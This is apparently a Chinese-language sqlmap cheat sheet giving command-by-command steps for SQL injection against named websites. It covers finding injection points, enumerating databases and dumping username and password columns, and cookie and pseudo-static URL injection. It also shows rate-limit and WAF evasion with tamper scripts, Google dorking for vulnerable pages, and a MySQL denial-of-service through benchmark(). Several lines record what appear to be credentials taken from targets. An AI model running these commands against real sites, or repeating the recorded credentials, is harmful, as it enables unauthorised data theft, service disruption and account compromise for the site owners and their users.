查找find / -name sqlmap
sqlmap地址/usr/share/golismero/tools/sqlmap
aqlmap 扫描文档存在地址 [INFO] fetched data logged to text files under '/usr/share/golismero/tools/sqlmap/output/www.cowinbio.com'
sqlmap大部分注入步骤相同(WEB深度剖析)
1.判断是否存在注入点:
sqlmap.py -u "http://www.nsu-cst.com/"
2.获取数据库:
sqlmap.py -u "http://www.nsu-cst.com/" --dbs
3.查看当前应用程序所用数据库:
sqlmap.py -u "http://www.nsu-cst.com/" --current-db
4.列出数据库的所有表:
sqlmap.py -u "http://www.nsu-cst.com/" --table -D “XXX(当前数据库名称)”
5.读取指定表中的字段名称:
sqlmap.py -u "http://www.nsu-cst.com/" --columns -T “YYY(表的的名称)”-D “XXX(当前数据库名称)”
6.读取指定字段内容:
sqlmap.py -u "http://www.nsu-cst.com/" --dump -C ”Username,PassWord (敏感字段名称)“ -T “[YYY](表的的名称)”-D “XXX(当前数据库名称)”
ACCESS数据库情况下的扫描
1--sqlmap -u "http://www.nsu-cst.com/" //扫描注入地址 并返回信息 判断数据库
2.--sqlmap -u "http://www.nsu-cst.com/" --tables 猜表
3. --sqlmap -u "http://www.zh234.com/ship.asp?id=4" --columns -T admin 猜字段
4. --sqlmap -u "http://www.zh234.com/ship.asp?id=4" --dump -T admin -C “username,password(可能的字段)” 猜字段里面的内容 (pwd=netjzg$3262132)
MYSQL数据库情况下的扫描(http://www.t123.ie/interior.php?id=2)
1.获取数据库 (--sqlmap -uhttp://www.123.ie/interior.php?id=2--dbs)
--sqlmap -uhttp://www.123.ie/interior.php?id=2-D(指定一个数据库) myslibrary(数据库名称) --tables 获取数据库当中的表
2.获取表中的字段(通过第1步寻找关键数据库名称)
--sqlmap -uhttp://www.123.ie/interior.php?id=2-D myslibrary -T hy—admin(数据库表名) --columns(字段的意思)
3.获取字段中的内容
--sqlmap -uhttp://www.t123s.ie/interior.php?id=2-D myslibrary -T hy—admin(数据库表名) -C id,user(字段名称) --dump
cookies注入(http://www.123.org/jsj/DownloadShow.asp?id=9)
1.sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2 (可用于判断数据库,猜表等,please enter number of threads? [Enter for 1 (current)] 输入线程 测试时为10--》等待猜解)
2.sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --columns -T admin(获取此字段) --level 2
3.查看敏感字段中的内容
sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --dump -T admin -C “username,password” --level 2 (admin chenli)
POST登录框注入
伪静态注入(http://sfl.123.edu.cn/index.php/Index/view/id/40.html)
1.获取数据库
sqlmap.py -uhttp://sfl.f123.edu.cn/index.php/Index/view/id/40*.html--dbs 【注意在存在注入的地方加一个”*“】
2.获取数据库当中的表
sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称) --tables
3.获取表中的字段
sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称)-T pe_user(敏感的表名称) --columns
4.获取敏感字段的内容
sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称)-T pe_user(敏感的表名称) -C password
5.关于请求延时的绕过命令
(1)sqlmap.py --dbs -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html--delay 1 //后面的参数是秒的意思,任意设置(可绕过网站保护措施,意思就是隔一秒访问一次正常页面)
(2)sqlmap.py--dbs -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html--safe-freq 3 //后面参数任意设置,结果同样是获取数据库
sqlmap中的谷歌搜索
可以在sqlmap里进行遍历:
sqlmap.py -g inurl:php?id=
Mysql DOS攻击
1.sqlmap -uhttp://192.168.159.1/news.php?id=1--sql-shell //首先获得一个shell
2.在shell这个地方执行select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
绕过WAF防火墙
使用:sqlmap.py -uhttp://192.168.159.1/news.php?id=1-v 3 --dbs --batch --tamper "spaceZmorehash.py"
//利用spaceZmorehash.py编码的脚本获取数据库
其他sqlmap脚本 "space2hash.py " " base64encode.py ""charencode.py",
不同的脚本针对不同的效果 ,自由发挥。
其他技巧
1.注入网站时查看权限 sqlmap.py -uhttp://192.168.159.1/news.php?id=1--privileges
网友评论